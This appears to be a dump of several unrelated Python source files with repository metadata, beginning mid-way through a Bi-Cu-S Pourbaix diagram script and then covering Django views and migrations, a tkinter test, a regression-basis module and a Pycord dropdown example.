species[28,3]=0 species[29,3]=0 species[30,3]=0 species[31,3]=0 species[32,3]=0 species[33,3]=0 species[34,3]=0 species[35,3]=0 species[36,3]=0 species[37,3]=0 species[38,3]=0 species[39,3]=0 species[40,3]=0 species[41,3]=0 species[42,3]=0 species[43,3]=0 species[44,3]=0 species[45,3]=0 species[46,3]=0 #CuBiSO species[47,3]=2 species[48,3]=7 species[49,3]=1 species[50,3]=1 species[51,3]=2 species[52,3]=1 species[53,3]=1 #BiSO species[54,3]=0 species[55,3]=0 species[56,3]=0 species[57,3]=0 species[58,3]=0 species[59,3]=0 #CuBiS species[60,3]=1 species[61,3]=4 species[62,3]=4 #BiCuSO species[63,3]=1 species[64,3]=3 ########### Number of Bismuths Bi ############################################# #Copper species[0,4]=0 species[1,4]=0 species[2,4]=0 species[3,4]=0 species[4,4]=0 species[5,4]=0 species[6,4]=0 species[7,4]=0 species[8,4]=0 species[9,4]=0 species[10,4]=0 species[11,4]=0 species[12,4]=0 #Bismuth species[13,4]=1 species[14,4]=2 species[15,4]=2 species[16,4]=2 species[17,4]=4 species[18,4]=1 species[19,4]=1 species[20,4]=1 #Sulphur species[21,4]=0 species[22,4]=0 species[23,4]=0 species[24,4]=0 species[25,4]=0 species[26,4]=0 species[27,4]=0 species[28,4]=0 species[29,4]=0 species[30,4]=0 species[31,4]=0 species[32,4]=0 species[33,4]=0 species[34,4]=0 species[35,4]=0 species[36,4]=0 species[37,4]=0 species[38,4]=0 species[39,4]=0 species[40,4]=0 species[41,4]=0 species[42,4]=0 species[43,4]=0 species[44,4]=0 species[45,4]=0 species[46,4]=0 #CuSBiO species[47,4]=0 species[48,4]=0 species[49,4]=0 species[50,4]=0 species[51,4]=0 species[52,4]=1 species[53,4]=2 #BiSO species[54,4]=1 species[55,4]=2 species[56,4]=2 species[57,4]=2 species[58,4]=14 species[59,4]=2 #CuBiS species[60,4]=1 species[61,4]=4 species[62,4]=5 #BiCuSO species[63,4]=1 species[64,4]=1 ########### Number of Sulphurs S ############################################# #Coppers species[0,5]=0 species[1,5]=0 species[2,5]=0 species[3,5]=0 species[4,5]=0 species[5,5]=0 species[6,5]=0 species[7,5]=0 species[8,5]=0 species[9,5]=0 species[10,5]=0 species[11,5]=0 species[12,5]=0 #Bismuth species[13,5]=0 species[14,5]=0 species[15,5]=0 species[16,5]=0 species[17,5]=0 species[18,5]=0 species[19,5]=0 species[20,5]=0 #Sulphur species[21,5]=1 species[22,5]=1 species[23,5]=1 species[24,5]=1 species[25,5]=2 species[26,5]=3 species[27,5]=4 species[28,5]=5 species[29,5]=2 species[30,5]=2 species[31,5]=2 species[32,5]=5 species[33,5]=4 species[34,5]=2 species[35,5]=2 species[36,5]=3 species[37,5]=1 species[38,5]=1 species[39,5]=1 species[40,5]=2 species[41,5]=1 species[42,5]=1 species[43,5]=1 species[44,5]=2 species[45,5]=1 species[46,5]=2 #CuSBiO species[47,5]=1 species[48,5]=4 species[49,5]=1 species[50,5]=2 species[51,5]=3 species[52,5]=0 species[53,5]=0 #BiSO species[54,5]=2 species[55,5]=3 species[56,5]=2 species[57,5]=3 species[58,5]=24 species[59,5]=1 #CuBiS species[60,5]=2 species[61,5]=9 species[62,5]=10 #BiCuSO species[63,5]=1 species[64,5]=3 ######### Number of H2O's ##################################################### #Copper species[0,6]=0 species[1,6]=1 species[2,6]=1 species[3,6]=0 species[4,6]=0 species[5,6]=4 species[6,6]=2 species[7,6]=3 species[8,6]=1 species[9,6]=2 species[10,6]=1 species[11,6]=2 species[12,6]=4 #Bi species[13,6]=0 species[14,6]=3 species[15,6]=5 species[16,6]=4 species[17,6]=7 species[18,6]=0 species[19,6]=1 species[20,6]=1 #Sulphur species[21,6]=0 species[22,6]=0 species[23,6]=0 species[24,6]=0 species[25,6]=0 species[26,6]=0 species[27,6]=0 species[28,6]=0 species[29,6]=3 species[30,6]=3 species[31,6]=3 species[32,6]=6 species[33,6]=6 species[34,6]=4 species[35,6]=4 species[36,6]=6 species[37,6]=3 species[38,6]=3 species[39,6]=3 species[40,6]=6 species[41,6]=4 species[42,6]=4 species[43,6]=4 species[44,6]=8 species[45,6]=5 species[46,6]=5 #CuSBiO species[47,6]=0 species[48,6]=0 species[49,6]=0 species[50,6]=0 species[51,6]=12 species[52,6]=0 species[53,6]=4 #BiSO species[54,6]=0 species[55,6]=0 species[56,6]=1 species[57,6]=12 species[58,6]=1 species[59,6]=2 #CuBiS species[60,6]=0 species[61,6]=0 species[62,6]=0 #BiCuSO species[63,6]=1 species[64,6]=0 ########## Aqueous Ions?????? ################################################# #Copper species[0,7]=0 species[1,7]=0 species[2,7]=0 species[3,7]=1 species[4,7]=1 species[5,7]=1 species[6,7]=1 species[7,7]=1 species[8,7]=1 species[9,7]=1 species[10,7]=1 species[11,7]=1 species[12,7]=1 #Bismuth species[13,7]=0 species[14,7]=0 species[15,7]=0 species[16,7]=0 species[17,7]=0 species[18,7]=1 species[19,7]=1 species[20,7]=1 #Sulphur species[21,7]=0 species[22,7]=1 species[23,7]=1 species[24,7]=1 species[25,7]=1 species[26,7]=1 species[27,7]=1 species[28,7]=1 species[29,7]=1 species[30,7]=1 species[31,7]=1 species[32,7]=1 species[33,7]=1 species[34,7]=1 species[35,7]=1 species[36,7]=1 species[37,7]=1 species[38,7]=1 species[39,7]=1 species[40,7]=1 species[41,7]=1 species[42,7]=1 species[43,7]=1 species[44,7]=1 species[45,7]=1 species[46,7]=1 #CuSBiO species[47,7]=0 species[48,7]=0 species[49,7]=0 species[50,7]=0 species[51,7]=0 species[52,7]=0 species[53,7]=0 #BiSO species[54,7]=0 species[55,7]=0 species[56,7]=0 species[57,7]=0 species[58,7]=0 species[59,7]=0 #CuBiS species[60,7]=0 species[61,7]=0 species[62,7]=0 #BiCuSO species[63,7]=0 species[64,7]=0 #Function to determine species combinations try: combos=load('BiCuOS-speciesCombo.npy') num=load('BiCuOS-numberSpecies.npy') combo_num=int(num[0]) except OSError: print('Cannot Open File') ############################################################################### #### Determine which species are able to combine at the composition ########### ############################################################################### t=1 flag=1 f_total=int; f=np.zeros((3)) combos=np.zeros((45000,9,3)) combo_num=0 combos[combo_num, 0, 0]=-1 combos[combo_num, 0, 1]=-1 combos[combo_num, 0, 2]=-1 for k in range(0, len(species)): for m in range(0, len(species)): for p in range(0, len(species)): #Check to make sure each element is in this combination of species if((species[k, 3]>0 or species[m, 3] >0 or species[p, 3]) \ and (species[k, 4]>0 or species[m, 4] >0 or species[p, 4]) \ and (species[k, 5]>0 or species[m, 5] >0 or species[p, 5])): #save species in array t=1 a = np.array([[species[k, 3],species[m, 3], species[p,3]], \ [species[k, 4],species[m, 4], species[p,4]], \ [species[k, 5],species[m, 5], species[p,5]]]) #check to see if each species contains a single element. This is a really long call. flag=1 if((species[k, 3]==0 and species[m, 3] ==0) or \ (species[m, 3]==0 and species[p, 3] ==0) or \ (species[k, 3]==0 and species[p, 3] ==0)): if((species[k, 4]==0 and species[m, 4] ==0) or \ (species[m, 4]==0 and species[p, 4] ==0) or \ (species[k, 4]==0 and species[p, 4] ==0)): if((species[k, 5]==0 and species[m, 5] ==0) or \ (species[m, 5]==0 and species[p, 5] ==0) or \ (species[k, 5]==0 and species[p, 5] ==0)): flag=0 #if so, find the composition though linear algebra. try: f=np.linalg.solve(a, composition) except: #print('Error: Species '+str(k)+', Species2: '+str(m)+', Species3: '+str(p)+'\n') t=1 t=0 #If there is at least one multi-element species in this combination if(flag==1): #test each linear combination for h in range(1, 20): for i in range(1, 20): for j in range(1, 20): #Is there a linear combination of the elements that will allow #For the if(((h*a[0,0]+i*a[0,1]+j*a[0,2])/(h*a[1,0]+i*a[1,1]+j*a[1,2]))==composition[0]/composition[1] and \ ((h*a[1,0]+i*a[1,1]+j*a[1,2])/(h*a[2,0]+i*a[2,1]+j*a[2,2]))==composition[1]/composition[2] and \ ((h*a[0,0]+i*a[0,1]+j*a[0,2])/(h*a[2,0]+i*a[2,1]+j*a[2,2]))==composition[0]/composition[2]): #save the composition f[0]=h f[1]=i f[2]=j #Ending parameters, break loops t=0; h=40; i=40; j=40; #If there is a linear combination, save the species in the combos array. if (t==0): #print(str(combo_num)+': Species1: '+str(k)+', Species2: '+str(m)+'\n') #Species Number combos[combo_num, 0, 0]=k combos[combo_num, 0, 1]=m combos[combo_num, 0, 2]=p #Energy combos[combo_num, 1, 0]=species[k,0] combos[combo_num, 1, 1]=species[m,0] combos[combo_num, 1, 2]=species[p,0] #Electrons combos[combo_num, 2, 0]=species[k,1] combos[combo_num, 2, 1]=species[m,1] combos[combo_num, 2, 2]=species[p,1] #H+ combos[combo_num, 3, 0]=species[k,2] combos[combo_num, 3, 1]=species[m,2] combos[combo_num, 3, 2]=species[p,2] #Number Silvers combos[combo_num, 4, 0]=species[k,3] combos[combo_num, 4, 1]=species[m,3] combos[combo_num, 4, 2]=species[p,3] #Number Bismuth combos[combo_num, 5, 0]=species[k,4] combos[combo_num, 5, 1]=species[m,4] combos[combo_num, 5, 2]=species[p,4] #Number H2O combos[combo_num, 6, 0]=species[k,5] combos[combo_num, 6, 1]=species[m,5] combos[combo_num, 6, 2]=species[p,5] #Aqueous Ions combos[combo_num, 7, 0]=species[k,6] combos[combo_num, 7, 1]=species[m,6] combos[combo_num, 7, 2]=species[p,6] #Percent of each in species in final combo f_total=f[0]+f[1]+f[2]; combos[combo_num, 8, 0]=f[0]/f_total combos[combo_num, 8, 1]=f[1]/f_total combos[combo_num, 8, 2]=f[2]/f_total combo_num=combo_num+1; t=1 #print('entered') else: #Catch and switch the value of t back to no t=1 save('BiCuOS-speciesCombo.npy', combos) save('BiCuOS-numberSpecies.npy', asarray([[combo_num]])) print('The number of species combinations is '+ str(combo_num)+'.\n') ############################################################################### ############################################################################### ############################################################################### ############################################################################### ########### Chemical Potential Mesh Calculations ############################ ############################################################################### #should be as long as there are specicies considered #populate with smaller values that will be calculated. muValues=np.zeros((n+1,n+1,4)) current_mu=int current_ele=int current_H=int current_H2O=int current_aquI=int current_NumEle=int sort=np.zeros((3,1)) #fill in the grid. Calculate for i in range(0, n+1): #calculate the energies for each species number pH=lowpH+(i*pHcount); for j in range(0,n+1): U=Ulow+(j*Ucount); muValues[i,j,0]=-1 muValues[i,j,1]=-1 muValues[i,j,2]=-1 muValues[i,j,3]=100000000 #Go through all species, commpare all pairs for k in range(0, combo_num): p=int(combos[k,0,0]); m=int(combos[k,0,1]); s=int(combos[k,0,2]); f1=combos[k,8,0]; f2=combos[k,8,1]; f3=combos[k,8,2]; #The first species's contribution to the mu current_eng=species[p,0] current_ele=F*U*(species[p,1]) current_H=R*T*np.log(10.0)*pH*(species[p,2]) current_H2O=dGf_H2O*(species[p,6]) current_aquI=R*T*np.log(nI)*(species[p,7]) current_NumEle=1 for t in range(3,6): if(species[p,t]>1): current_NumEle=current_NumEle*species[p,t]; current_mu=f1*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle); #The second species' contribution to the mu current_eng=species[m,0]; current_ele=F*U*(species[m,1]) current_H=R*T*np.log(10.0)*pH*(species[m,2]) current_H2O=dGf_H2O*(species[m,6]) current_aquI=R*T*np.log(nI)*(species[m,7]) current_NumEle=1 for t in range(3,6): if(species[m,t]>1): current_NumEle=current_NumEle*species[m,t]; current_mu=current_mu+f2*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle); #The second species' contribution to the mu current_eng=species[s,0]; current_ele=F*U*(species[s,1]) current_H=R*T*np.log(10.0)*pH*(species[s,2]) current_H2O=dGf_H2O*(species[s,6]) current_aquI=R*T*np.log(nI)*(species[s,7]) current_NumEle=1 for t in range(3,6): if(species[s,t]>1): current_NumEle=current_NumEle*species[s,t]; current_mu=current_mu+f3*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle); if(current_mu<muValues[i,j,3]): sort[0,0]=p sort[1,0]=m sort[2,0]=s a=np.sort(sort[:,0]) muValues[i,j,0]=a[0] muValues[i,j,1]=a[1] muValues[i,j,2]=a[2] muValues[i,j,3]=current_mu ############################################################################### ############################################################################### ############################################################################### ############################################################################### ################### Plot Pourbaix Diagram ################################### ############################################################################### flag = np.zeros((50,6)) # The first 4 indexes are the materials stored, the next three are the colors index=0; fig =plt.figure() ax=plt.subplot(111) ax = plt.gca() ax.set_xlim([lowpH,highpH]) ax.set_ylim([Ulow,Uhigh]) l=0; index=0; for i in range(0, n+1): pH=lowpH+i*pHcount; for j in range(0,n+1): U=Ulow+(Ucount*j); l=0 for k in range(0, len(flag)): if(flag[k,0]==muValues[i,j,0] and flag[k,1]==muValues[i,j,1] and flag[k,2]==muValues[i,j,2]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,0] and flag[k,1]==muValues[i,j,2]and flag[k,2]==muValues[i,j,1]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,1] and flag[k,1]==muValues[i,j,2]and flag[k,2]==muValues[i,j,0]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,1] and flag[k,1]==muValues[i,j,0]and flag[k,2]==muValues[i,j,2]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,2] and flag[k,1]==muValues[i,j,0]and flag[k,2]==muValues[i,j,1]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,2] and flag[k,1]==muValues[i,j,1]and flag[k,2]==muValues[i,j,0]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 if(l==0): label='M1: '+str(muValues[i,j,0])+', M2: '+str(muValues[i,j,1])+' M3: '+str(muValues[i,j,2]) flag[index,0] = muValues[i,j,0] flag[index,1] = muValues[i,j,1] flag[index,2] = muValues[i,j,2] flag[index,3] = random.random(); flag[index,4] = random.random(); flag[index,5] = random.random(); ax.plot(pH,U,'.', color = [flag[index,3],flag[index,4],flag[index,5]],markersize=4,label=label) index=index+1; #####Plot H2O and H2 lines################################## muH=np.zeros((pHrange+1)); muH2O=np.zeros((pHrange+1)); pHArray=np.zeros((pHrange+1)); for i in range(0, pHrange): pHArray[i] =lowpH+i; muH[i]=-0.059*pHArray[i]; muH2O[i]=1.23-0.059*pHArray[i]; pHArray[pHrange] =lowpH+(pHrange); muH[pHrange]=-0.059*pHArray[pHrange]; muH2O[pHrange]=1.23-0.059*pHArray[pHrange]; ############################################################## ax.plot(pHArray[:], muH[:],'c--',label='$H_2$',linewidth=1) ax.plot(pHArray[:], muH2O[:],'b--',label='$H_2O$', linewidth=1) ax.legend(loc='upper center', bbox_to_anchor=(1.3, 0.9), ncol=1) plt.ylabel('Electric Potential, E(V)') plt.xlabel('pH') plt.title('Bi-Cu-S Pourbaix Diagram, $\eta_{Bi,Cu,S}=10^{-'+str(eta)+'}$, '+str(composition[0])+'Cu:' +str(composition[1])+'Bi:'+str(composition[2])+'S') ############################################################################### ############## Plot with Lines ############################################ ############################################################################### flag = np.zeros((50,6)) # The first 4 indexes are the materials stored, the next three are the colors index=0; fig =plt.figure() ax=plt.subplot(111) ax = plt.gca() ax.set_xlim([lowpH,highpH]) ax.set_ylim([Ulow,Uhigh]) #If drawing lines for metastable phases for i in range(1, n): #calculate the energies for each species number pH=lowpH+(i*pHcount); for j in range(1,n): U=Ulow+(j*Ucount); #If drawing lines for metastable phases if((muValues[i,j,0]!=muValues[i-1,j,0])): ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2) elif(muValues[i,j,1]!=muValues[i-1,j,1]): ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2) elif((muValues[i,j,0]!=muValues[i,j-1,0]) or (muValues[i,j,1]!=muValues[i,j-1,1])): ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2) elif((muValues[i,j,2]!=muValues[i,j-1,2]) or (muValues[i,j,2]!=muValues[i-1,j,2])): ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2) ax.plot(pHArray[:], muH[:],'c--',label='$H_2$',linewidth=1) ax.plot(pHArray[:], muH2O[:],'b--',label='$H_2O$', linewidth=1) plt.ylabel('Electric Potential, E(V)') plt.xlabel('pH') plt.title('Bi-Cu-S Pourbaix Diagram, $\eta_{Bi,Cu,S}=10^{-'+str(eta)+'}$, '+str(composition[0])+'Cu:' +str(composition[1])+'Bi:'+str(composition[2])+'S') chartBox=ax.get_position() ax.set_position([chartBox.x0, chartBox.y0, chartBox.width*1.5, chartBox.height*1.5]) ax.legend(loc='upper center', bbox_to_anchor=(1.3, 0.9), ncol=1) plt.show() print('End of Script')
2.78125
3
masjid/views.py
1935090/donation
0
12789913
from django.shortcuts import render from .models import Masjid, SalahTime from .serializers import MasjidSerializer, SalahTimeSerializer from rest_framework import viewsets from rest_framework.decorators import api_view from masjid.models import Masjid from rest_framework.response import Response from rest_framework import status from rest_framework_extensions.mixins import NestedViewSetMixin from users.models import CustomUser class MasjidViewSet(viewsets.ModelViewSet): queryset = Masjid.objects.all() serializer_class = MasjidSerializer class SalahTimeViewSet(viewsets.ModelViewSet): queryset = SalahTime.objects.all() serializer_class = SalahTimeSerializer @api_view(['GET']) def getAllMasjid(request): if request.method == 'GET': masjids = Masjid.objects.all() masjid_dict = {} masjid_list = [] if masjids: for obj in masjids: masjid_id = obj.id try: salatime_obj = SalahTime.objects.get(masjid_id=masjid_id) except SalahTime.DoesNotExist: salatime_obj = None try: masjid_user = CustomUser.objects.get(id=obj.masjid_user) except CustomUser.DoesNotExist: masjid_user = None salatime_obj_dict = {} if salatime_obj: salatime_obj_dict = { "id": salatime_obj.id, "fajar_azan":salatime_obj.fajar_azan , "fajar_prayer":salatime_obj.fajar_prayer , "dhuhr_azan":salatime_obj.Dhuhr_azan , "dhuhr_prayer":salatime_obj.Dhuhr_prayer , "asr_azan":salatime_obj.Asr_azan , "asr_prayer":salatime_obj.Asr_prayer , "maghrib_azan":salatime_obj.Maghrib_azan , "maghrib_prayer":salatime_obj.Maghrib_prayer , "isha_azan":salatime_obj.Isha_azan , "isha_prayer":salatime_obj.Isha_prayer , "jummah_azan":salatime_obj.jummah_azan , "jummah_prayer":salatime_obj.jummah_prayer , } if masjid_user.profile_pic: masjid_dict = { "id":obj.id, "name":obj.name, "address":obj.address, "profile_pic":masjid_user.profile_pic.url, "salatime": salatime_obj_dict, } masjid_list.append(masjid_dict) else: masjid_dict = { "id":obj.id, "name":obj.name, "address":obj.address, "profile_pic":None, "salatime": salatime_obj_dict, } masjid_list.append(masjid_dict) return Response({ "status": status.HTTP_200_OK, "masjid_list":masjid_list }) else: return Response({ "status": status.HTTP_204_NO_CONTENT, "message": "No any masjid found", }) return Response({"message": "Method not allowed"})
2
2
db-server/dbcon/migrations/0003_auto_20210528_1824.py
JannisBush/xs-leaks-browser-web
0
12789914
<gh_stars>0 # Generated by Django 3.2.3 on 2021-05-28 18:24 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('dbcon', '0002_auto_20210528_1657'), ] operations = [ migrations.CreateModel( name='WindowProperties', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('op_frame_count', models.TextField()), ('op_win_window', models.TextField()), ('op_win_CSS2Properties', models.TextField()), ('op_win_origin', models.TextField()), ('op_win_opener', models.TextField()), ], ), migrations.RemoveConstraint( model_name='objectproperties', name='op', ), migrations.RemoveField( model_name='objectproperties', name='op_frame_count', ), migrations.RemoveField( model_name='objectproperties', name='op_win_CSS2Properties', ), migrations.RemoveField( model_name='objectproperties', name='op_win_opener', ), migrations.RemoveField( model_name='objectproperties', name='op_win_origin', ), migrations.RemoveField( model_name='objectproperties', name='op_win_window', ), migrations.AlterField( model_name='events', name='event_list', field=models.TextField(), ), migrations.AlterField( model_name='events', name='event_set', field=models.TextField(), ), migrations.AlterField( model_name='globalproperties', name='gp_download_bar_height', field=models.TextField(), ), migrations.AlterField( model_name='globalproperties', name='gp_securitypolicyviolation', field=models.TextField(), ), migrations.AlterField( model_name='globalproperties', name='gp_window_getComputedStyle', field=models.TextField(), ), migrations.AlterField( model_name='globalproperties', name='gp_window_hasOwnProperty', field=models.TextField(), ), migrations.AlterField( model_name='globalproperties', name='gp_window_onblur', field=models.TextField(), ), migrations.AlterField( model_name='globalproperties', name='gp_window_onerror', field=models.TextField(), ), migrations.AlterField( model_name='globalproperties', name='gp_window_postMessage', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_buffered', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_duration', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_height', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_media_error', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_naturalHeight', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_naturalWidth', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_networkState', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_paused', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_readyState', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_seekable', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_sheet', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_videoHeight', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_videoWidth', field=models.TextField(), ), migrations.AlterField( model_name='objectproperties', name='op_el_width', field=models.TextField(), ), migrations.AddConstraint( model_name='objectproperties', constraint=models.UniqueConstraint(fields=('op_el_height', 'op_el_width', 'op_el_naturalHeight', 'op_el_naturalWidth', 'op_el_videoHeight', 'op_el_videoWidth', 'op_el_duration', 'op_el_networkState', 'op_el_readyState', 'op_el_buffered', 'op_el_paused', 'op_el_seekable', 'op_el_sheet', 'op_el_media_error'), name='op'), ), migrations.AddConstraint( model_name='windowproperties', constraint=models.UniqueConstraint(fields=('op_frame_count', 'op_win_window', 'op_win_CSS2Properties', 'op_win_origin', 'op_win_opener'), name='win'), ), migrations.AddField( model_name='observation', name='window_properties', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='dbcon.windowproperties'), ), ]
1.546875
2
ooppython3/modalidade.py
mpeschke/PARADIG-PROG-N1-OOP-PYTHON3
0
12789915
# coding=UTF-8 """ Módulo: Fornece a superclasse com todos os métodos necessários para implementar uma modalidade de competição de olimpíadas. """ from ooppython3.adversario import Adversario class Modalidade: """ Superclasse representando uma modalidade de competição das olimpíadas. """ _adversarios = [] _input = None _numtentativas = None _numadversarios = None _mensagem = None _vencedor = "Empate" def __init__(self, inp, numtentativas, numadversarios, mensagem): """ Construtor. @param inp: instância da classe responsável pela entrada de dados. @param numtentativas: número de tentativas (notas, arremessos) para classificação na competição. @param numadversarios: número de adversários na competição. @param mensagem: Mensagem fornecida pra orientar a entrada de dados. """ self._input = inp self._numtentativas = numtentativas self._numadversarios = numadversarios self._mensagem = mensagem def validarentrada(self, entrada): """ Valida a entrada de dados (notas, arremessos) do adversário. @param entrada: (notas, arremessos) do adversário. @return: True (válidas) ou False (inválidas). """ if len(self._adversarios) is self._numadversarios: return False _strtentativas = entrada.split(',') if len(_strtentativas) < self._numtentativas: return False try: _floattentativas = [float(x) for x in _strtentativas] except ValueError: return False if len(_floattentativas) is self._numtentativas: self._adversarios.append( Adversario( nome="Adversario {}".format(len(self._adversarios)+1), resultado=_floattentativas ) ) return True return False def lerentrada(self, numadversario): """ Captura a entrada de dados do usuário. @param numadversario: identificador do adversário. @return: entrada de dados do usuário. """ return self._input.input( self._mensagem.format( self._numtentativas, numadversario ) ) def iniciar(self): """ Executa a competição (processa os resultados). Notar que a superclasse processa apenas uma parte comum a todas as competições, que é ordenar os resultados. @return: None """ for adversario in self.adversarios(): adversario.resultado().sort(reverse=True) def numeroadversarios(self): """ Número de adversários. @return: número de adversários. """ return self._numadversarios def numerotentativas(self): """ Número de tentativas (notas, arremessos) @return: número de tentativas (notas, arremessos). """ return self._numtentativas def adversarios(self): """ Lista de adversários na competição. @return: lista de adversários (instâncias 'adversario'). """ return self._adversarios def vencedor(self): """ Vencedor da competição. @return: Nome do vencedor (adversário) ou 'Empate' em caso de empate. """ return self._vencedor
3.5
4
advancedapplication/test.py
wDove1/motorisedcameratracking
0
12789916
# import tkinter module from tkinter import * from tkinter.ttk import * # creating main tkinter window/toplevel master = Tk() # this will create a label widget l1 = Label(master, text = "Height") l2 = Label(master, text = "Width") # grid method to arrange labels in respective # rows and columns as specified l1.grid(row = 0, column = 0, sticky = W, pady = 2) l2.grid(row = 1, column = 20, sticky = W, pady = 2) # entry widgets, used to take entry from user e1 = Entry(master) e2 = Entry(master) # this will arrange entry widgets e1.grid(row = 0, column = 1, pady = 2) e2.grid(row = 1, column = 1, pady = 2) # checkbutton widget c1 = Checkbutton(master, text = "Preserve") c1.grid(row = 2, column = 0, sticky = W, columnspan = 2) # adding image (remember image should be PNG and not JPG) #img = PhotoImage(file = r"C:\Users\Admin\Pictures\capture1.png") #img1 = img.subsample(2, 2) # setting image with the help of label #Label(master, image = img1).grid(row = 0, column = 2, # columnspan = 2, rowspan = 2, padx = 5, pady = 5) # button widget b1 = Button(master, text = "Zoom in") b2 = Button(master, text = "Zoom out") # arranging button widgets b1.grid(row = 2, column = 2, sticky = E) b2.grid(row = 2, column = 3, sticky = E) # infinite loop which can be terminated # by keyboard or mouse interrupt mainloop()
3.96875
4
third_party/longstaff_schwartz/regression_basis.py
christiandorion/hecmtl
17
12789917
<reponame>christiandorion/hecmtl<filename>third_party/longstaff_schwartz/regression_basis.py # -*- coding: utf-8 -*- import numpy as np from numpy.linalg import lstsq class RegressionBasis: def __init__(self, basis_functions): self.basis_functions = basis_functions def __str__(self): return ' + '.join(str(f) for f in self.basis_functions) def apply(self, x): for f in self.basis_functions: yield f(x) def __call__(self, x): assert x.ndim == 1 x = x.reshape((x.shape[0], 1)) return np.concatenate(tuple(self.apply(x)), axis=1) def fit(self, x, y): beta, *_ = lstsq(self(x), y, rcond=None) return FittedFunction(self, beta, (x.min(), x.max())) class FittedFunction: def __init__(self, basis, beta, domain): self.basis = basis self.beta = beta self.domain = domain def __call__(self, x): return self.basis(x) @ self.beta def linspace(self, n=100, domain=None): domain = domain or self.domain x = np.linspace(domain[0], domain[1], n) return x, self(x) class PolynomialRegressionFunction: def __init__(self, exponent): self.exponent = exponent def __str__(self): return f'x**{self.exponent}' def __call__(self, x): return x ** self.exponent class PolynomialRegressionBasis(RegressionBasis): def __init__(self, degree): super().__init__([PolynomialRegressionFunction(i) for i in range(degree + 1)]) self.degree = degree
2.375
2
examples/views/dropdown.py
Mihitoko/pycord
0
12789918
<gh_stars>0 import discord # Defines a custom Select containing colour options # that the user can choose. The callback function # of this class is called when the user changes their choice. class Dropdown(discord.ui.Select): def __init__(self, bot_: discord.Bot): # For example, you can use self.bot to retrieve a user or perform other functions in the callback. # Alternatively you can use Interaction.client, so you don't need to pass the bot instance. self.bot = bot_ # Set the options that will be presented inside the dropdown: options = [ discord.SelectOption(label="Red", description="Your favourite colour is red", emoji="🟥"), discord.SelectOption(label="Green", description="Your favourite colour is green", emoji="🟩"), discord.SelectOption(label="Blue", description="Your favourite colour is blue", emoji="🟦"), ] # The placeholder is what will be shown when no option is selected. # The min and max values indicate we can only pick one of the three options. # The options parameter, contents shown above, define the dropdown options. super().__init__( placeholder="Choose your favourite colour...", min_values=1, max_values=1, options=options, ) async def callback(self, interaction: discord.Interaction): # Use the interaction object to send a response message containing # the user's favourite colour or choice. The self object refers to the # Select object, and the values attribute gets a list of the user's # selected options. We only want the first one. await interaction.response.send_message(f"Your favourite colour is {self.values[0]}") # Defines a simple View that allows the user to use the Select menu. class DropdownView(discord.ui.View): def __init__(self, bot_: discord.Bot): self.bot = bot_ super().__init__() # Adds the dropdown to our View object self.add_item(Dropdown(self.bot)) # Initializing the view and adding the dropdown can actually be done in a one-liner if preferred: # super().__init__(Dropdown(self.bot)) bot = discord.Bot(debug_guilds=[...]) @bot.slash_command() async def colour(ctx: discord.ApplicationContext): """Sends a message with our dropdown that contains colour options.""" # Create the view containing our dropdown view = DropdownView(bot) # Sending a message containing our View await ctx.respond("Pick your favourite colour:", view=view) @bot.event async def on_ready(): print(f"Logged in as {bot.user} (ID: {bot.user.id})") print("------") bot.run("TOKEN")
3.640625
4
ratings/urls.py
daltonamitchell/rating-dashboard
1
12789919
<gh_stars>1-10 from django.conf.urls import url from . import views urlpatterns = [ url(r'^new/$', views.create, name='new'), url(r'^store/', views.store, name='store'), url(r'^$', views.index, name='index'), ]
1.53125
2
app/resources/SearchEndpoint.py
ajlouie/ithriv_service-1
0
12789920
